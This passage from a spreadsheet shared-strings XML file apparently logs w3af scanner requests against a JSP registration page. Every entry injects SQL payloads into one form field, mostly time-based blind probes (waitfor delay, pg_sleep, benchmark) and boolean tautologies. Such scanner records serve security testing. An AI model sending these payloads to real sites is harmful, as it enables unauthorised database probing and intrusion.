    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1+or+pg_sleep(5)&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1'+or+pg_sleep(5)+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1"+or+pg_sleep(5)+or+"1"="1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79"+or+"79"="79&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=79"+and+"79"="80&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=79'+or+'79'='79&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=79'+and+'79'='80&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=79+or+79=79+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=79+and+79=80+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1;waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1);waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1';waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1');waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1'));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1+or+benchmark(2500000,md5(1))&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1+or+pg_sleep(5)&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1'+or+pg_sleep(5)+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1"+or+pg_sleep(5)+or+"1"="1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26"+or+"26"="26&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=26"+and+"26"="27&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=26'+or+'26'='26&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=26'+and+'26'='27&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=26+or+26=26+&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=26+and+26=27+&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1;waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1);waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1';waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1');waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+benchmark(2500000,md5(1))&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+pg_sleep(5)&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+pg_sleep(5)+or+'1'='1&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+pg_sleep(5)+or+"1"="1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49"+or+"49"="49&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=49"+and+"49"="50&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=49'+or+'49'='49&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=49'+and+'49'='50&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=49+or+49=49+&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=49+and+49=50+&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1;waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1);waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1));waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1';waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1');waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1'));waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1+or+benchmark(2500000,md5(1))&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1+or+pg_sleep(5)&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1'+or+pg_sleep(5)+or+'1'='1&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1"+or+pg_sleep(5)+or+"1"="1&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=30"+or+"30"="30&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=30"+and+"30"="31&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=30'+or+'30'='30&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=30'+and+'30'='31&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=30+or+30=30+&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=30+and+30=31+&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1;waitfor+delay+'0:0:5'--&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1);waitfor+delay+'0:0:5'--&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1));waitfor+delay+'0:0:5'--&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1';waitfor+delay+'0:0:5'--&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1');waitfor+delay+'0:0:5'--&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'));waitfor+delay+'0:0:5'--&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+benchmark(2500000,md5(1))&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+pg_sleep(5)&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+pg_sleep(5)+or+'1'='1&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+pg_sleep(5)+or+"1"="1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16"+or+"16"="16&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=16"+and+"16"="17&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=16'+or+'16'='16&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=16'+and+'16'='17&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=16+or+16=16+&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=16+and+16=17+&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1;waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1);waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1';waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1');waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1'));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1+or+benchmark(2500000,md5(1))&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1+or+pg_sleep(5)&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
